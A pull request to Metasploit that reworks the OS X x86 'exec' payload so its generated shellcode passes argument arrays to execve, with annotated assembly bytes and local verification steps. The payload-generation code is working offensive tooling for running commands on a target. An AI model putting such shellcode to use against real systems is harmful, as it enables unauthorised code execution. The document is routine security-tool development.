### PR TITLE
RM #2095: x86 osx exec payload doesnt accept args

### DIFF
--- a/modules/payloads/singles/osx/x86/exec.rb
+++ b/modules/payloads/singles/osx/x86/exec.rb
@@ -48,7 +48,7 @@ module Metasploit3
 	def generate_stage
 		cmd_str   = datastore['CMD'] || ''
 		# Split the cmd string into arg chunks
-		cmd_parts = cmd_str.split(/[\s]+/)
+		cmd_parts = Shellwords.shellsplit(cmd_str)
 		# the non-exe-path parts of the chunks need to be reversed for execve
 		cmd_parts = ([cmd_parts.first] + (cmd_parts[1..-1] || []).reverse).compact
 		arg_str = cmd_parts.map { |a| "#{a}\x00" }.join
@@ -61,7 +61,7 @@ module Metasploit3
 
 		# now EBX contains &cmd_parts[0], the exe path
 		if cmd_parts.length > 1
-			# Build an array of pointers to the arguments we copied on to the stack
+			# Build an array of pointers to arguments
 			payload += "\x89\xD9" +                   # mov ecx, ebx
 			           "\x50" +                       # push eax; null byte (end of array)
 			           "\x89\xe2"                     # mov edx, esp (EDX points to the end-of-array null byte)

--- a/modules/payloads/singles/osx/x86/exec.rb
+++ b/modules/payloads/singles/osx/x86/exec.rb
@@ -26,7 +26,9 @@ module Metasploit3
 		super(merge_info(info,
 			'Name'          => 'OS X Execute Command',
 			'Description'   => 'Execute an arbitrary command',
-			'Author'        => [ 'snagg <snagg[at]openssl.it>', 'argp <argp[at]census-labs.com>' ],
+			'Author'        => [ 'snagg <snagg[at]openssl.it>', 
+			                     'argp <argp[at]census-labs.com>',
+			                     'joev <jvennix[at]rapid7.com>' ],
 			'License'       => BSD_LICENSE,
 			'Platform'      => 'osx',
 			'Arch'          => ARCH_X86))
@@ -35,22 +37,62 @@ module Metasploit3
 		register_options(
 			[
 				OptString.new('CMD',  [ true,  "The command string to execute" ]),
-			], self.class)
+			], self.class
+		)
 	end
 
 	#
 	# Dynamically builds the exec payload based on the user's options.
 	#
 	def generate_stage
-		cmd     = datastore['CMD'] || ''
-		len     = cmd.length + 1
-		payload =
-			"\x31\xc0\x50" +
-			Rex::Arch::X86.call(len) + cmd +
-			"\x00\x5e\x89\xe7\xb9" + Rex::Arch::X86.pack_word(len) +
-			"\x00\x00\xfc\xf2\xa4\x89\xe3\x50" +
-			"\x50\x53\xb0\x3b\x50\xcd\x80"
+		cmd_str   = datastore['CMD'] || ''
 
+		# Split the cmd string into arg chunks
+		cmd_parts = cmd_str.split(/[\s]+/)
+		arg_str = cmd_parts.map { |a| "#{a}\x00" }.join
+		arg_len = arg_str.length
+
+		# Stuff an array of arg strings into memory, then copy them all on to the stack
+		payload = ''
+		payload << "\x31\xc0"                         # XOR EAX, EAX  (eax => 0)
+		payload << "\x50"                             # PUSH EAX
+		payload << Rex::Arch::X86.call(arg_len)       # JMPs over CMD_STR, stores &CMD_STR on stack     
+		payload << arg_str
+		payload << "\x5e"                             # POP ESI (ESI = &CMD)
+		payload << "\x89\xe7"                         # MOV EDI, ESP
+		payload << "\xb9"                             # MOV ECX ...
+		payload << [arg_len].pack('V')
+		payload << "\xfc"                             # CLD
+		payload << "\xf2\xa4"                         # REPNE MOVSB  (copies string on to stack)
+		payload << "\x89\xe3"                         # MOV EBX, ESP     (puts ref to copied str in EBX)
+
+		# now EBX contains &cmd_parts[0], the exe path (after it has been copied to the stack)
+		if cmd_parts.length > 1
+			# Build an array of pointers to the arguments we copied on to the stack
+			payload << "\x89\xD9"                     # MOV ECX, EBX
+			payload << "\x50"                         # PUSH EAX; null byte (end of array)
+			payload << "\x89\xe2"                     # MOV EDX, ESP (EDX points to the end-of-array null byte)
+			cmd_parts[1..-1].each_with_index do |arg, idx|
+				# can probably save space here by doing the loop in ASM
+				# for each arg, push its current memory location on to the stack
+				payload << "\x81\xC1"                 # ADD ECX, + len of previous arg
+				payload << [cmd_parts[idx].length+1].pack('V') # (cmd_parts[idx] is the prev arg)
+				payload << "\x51"                     # PUSH ECX (&cmd_parts[idx])
+			end
+			payload << "\x53"                         # PUSH EBX (&cmd_parts[0])
+			payload << "\x89\xe1"                     # MOV ECX, ESP (ptr to ptr to first str)
+			payload << "\x52"                         # PUSH EDX
+			payload << "\x51"                         # PUSH ECX
+		else
+			# pass NULL args array to execve() call
+			payload << "\x50\x50"                     # PUSH EAX, PUSH EAX
+		end
+
+		payload << "\x53"                             # PUSH EBX
+		payload << "\xb0\x3b"                         # MOV AL, 0x3B (execve)
+		payload << "\x50"                             # PUSH EAX
+		payload << "\xcd\x80"                         # INT 0x80 (triggers execve syscall)
+
+		payload
 	end
-
 end

--- a/modules/payloads/singles/osx/x86/exec.rb
+++ b/modules/payloads/singles/osx/x86/exec.rb
@@ -26,7 +26,7 @@ module Metasploit3
 		super(merge_info(info,
 			'Name'          => 'OS X Execute Command',
 			'Description'   => 'Execute an arbitrary command',
-			'Author'        => [ 'snagg <snagg[at]openssl.it>', 
+			'Author'        => [ 'snagg <snagg[at]openssl.it>',
 			                     'argp <argp[at]census-labs.com>',
 			                     'joev <jvennix[at]rapid7.com>' ],
 			'License'       => BSD_LICENSE,


### PR DESCRIPTION
### Description:

Updates the osx x86 exec payload in the following ways:
- adds support for passing an arg array to execve()
- removed an unnecessary copy-to-stack (the data was already stuffed in instruction memory)
### Verification:
- [x] Checkout the master branch and generate an osx/x86/exec payload that runs the `/bin/ls` command:
  
  ```
  $ git checkout master
  $ ./msfpayload osx/x86/exec CMD="/bin/ls" R > ~/Desktop/exec_master.bin
  ```
- [x] Checkout my branch and generate the same payload:
  
  ```
  $ git checkout jvennix-r7:bug/x86-osx-exec-payload-doesnt-accept-args
  $ ./msfpayload osx/x86/exec CMD="/bin/ls" R > ~/Desktop/exec_joev.bin
  ```
- [x] Do a diff of the two payloads. It will look like:
  
  ![payload_diff](https://f.cloud.github.com/assets/1184013/820060/2e36cf62-efbd-11e2-84e5-c43189c95db6.png)
  
  Here is a disassembled comparison, for reference:
  
  ![asm-compare](https://f.cloud.github.com/assets/1184013/820365/eeea3d3e-efc2-11e2-8038-2a0a0cdd4675.png)
  
  Here are the reasons for the changes:
  1. Delete 1 byte at offset 0x2: This pushed `eax` (0x00) on to the stack, which was ended up "in front" of the string that gets copied to the stack. It served no other purpose so I killed it.
  2. Delete 6 bytes at offset 0xf. This removes the copy-string-to-stack call (the `repne movsb` instruction) and the set up required for this instruction. The data is already in instruction memory, so we can just use the original reference.
  3. Replace 7 bytes at offset 0x16 with 1 byte (same as #2).
- [x] Now test the payload. Output as an executable:
  
  ```
  $ ./msfpayload osx/x86/exec CMD="/bin/ls" X > ~/Desktop/exec_joev_exe.bin
  $ chmod +x ~/Desktop/exec_joev_exe.bin
  $ arch -i386 ~/Desktop/exec_joev_exe.bin
  ```
- [x] You should see an output like `usage: ls [-ABCFGHLOPRSTUWabcdefghiklmnopqrstuwx1] [file ...]`
- [x] Now test passing arguments. Compile the following C program:
  
  ```
  #include <stdio.h>
  int main(int argc, char *argv[]) {
      int x;
      for (x = 0; x < argc; x++) {
          printf("%s\n", argv[x]);
      }
      return 0;
  }
  
  
  $ gcc ~/Desktop/print_args.c -O ~/Desktop/print_args
  $ ~/Desktop/print_args           # should output "./print_args" to the console
  ```
- [x] Compile a payload that passes args:
  
  ```
  $ ./msfpayload osx/x86/exec CMD="/Users/joe/Desktop/print_args a bb ccc dddd eeeee ffffff ggggggg hhhhhhhh" X > ~/Desktop/exec_joev_exe_args.bin
  $ chmod +x ~/Desktop/exec_joev_exe_args.bin
  $ arch -i386 ~/Desktop/exec_joev_exe_args.bin
  ```
- [x] You should see the following output:
  
  ```
  /Users/joe/Desktop/print_args
  a
  bb
  ccc
  dddd
  eeeee
  ffffff
  ggggggg
  hhhhhhhh
  ```
